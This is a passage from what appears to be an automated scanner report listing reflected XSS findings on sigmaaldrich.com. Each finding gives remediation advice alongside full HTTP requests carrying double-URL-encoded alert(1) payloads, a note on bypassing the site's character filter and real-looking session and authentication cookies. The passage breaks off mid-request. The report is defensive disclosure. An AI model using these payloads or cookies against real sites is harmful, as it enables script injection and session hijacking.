Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/helpbc6c7%2522%253balert%25281%2529%252f%252f7f7383024f7/help-welcome/ordering-product/favorites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:18 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/helpbc6c7";alert(1)//7f7383024f7/help-welcome/ordering-product/favorites.html","E404") ;
   </script>
...[SNIP]...

1.606. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2c43%2522%253balert%25281%2529%252f%252ffed4d24df0f was submitted in the REST URL parameter 3. This input was echoed as e2c43";alert(1)//fed4d24df0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcomee2c43%2522%253balert%25281%2529%252f%252ffed4d24df0f/ordering-product/favorites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:19 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcomee2c43";alert(1)//fed4d24df0f/ordering-product/favorites.html","E404") ;
   </script>
...[SNIP]...

1.607. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 420be%2522%253balert%25281%2529%252f%252f1a0531a0d8a was submitted in the REST URL parameter 4. This input was echoed as 420be";alert(1)//1a0531a0d8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome/ordering-product420be%2522%253balert%25281%2529%252f%252f1a0531a0d8a/favorites.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:21 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome/ordering-product420be";alert(1)//1a0531a0d8a/favorites.html","E404") ;
   </script>
...[SNIP]...

1.608. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/favorites.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/favorites.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62562%2522%253balert%25281%2529%252f%252fabedcc9514b was submitted in the REST URL parameter 5. This input was echoed as 62562";alert(1)//abedcc9514b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/help/help-welcome/ordering-product/62562%2522%253balert%25281%2529%252f%252fabedcc9514b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:23 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich/help/help-welcome/ordering-product/62562";alert(1)//abedcc9514b","E404") ;
   </script>
...[SNIP]...

1.609. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175e3%2522%253balert%25281%2529%252f%252f33e8961aff1 was submitted in the REST URL parameter 1. This input was echoed as 175e3";alert(1)//33e8961aff1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich175e3%2522%253balert%25281%2529%252f%252f33e8961aff1/help/help-welcome/ordering-product/search-add-to-cart.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:13 GMT
Content-Length: 28976
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/sigma-aldrich175e3";alert(1)//33e8961aff1/help/help-welcome/ordering-product/search-add-to-cart.html","E404") ;
   </script>
...[SNIP]...

1.610. http://www.sigmaaldrich.com/sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /sigma-aldrich/help/help-welcome/ordering-product/search-add-to-cart.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d70%2522%253balert%25281%2529%252f%252fb4b75ed686f was submitted in the REST URL parameter 2. This input was echoed as d0d70";alert(1)//b4b75ed686f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sigma-aldrich/helpd0d70%2522%253balert%25281%2529%252f%252fb4b75ed686f/help-welcome/ordering-product/search-add-to-cart.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
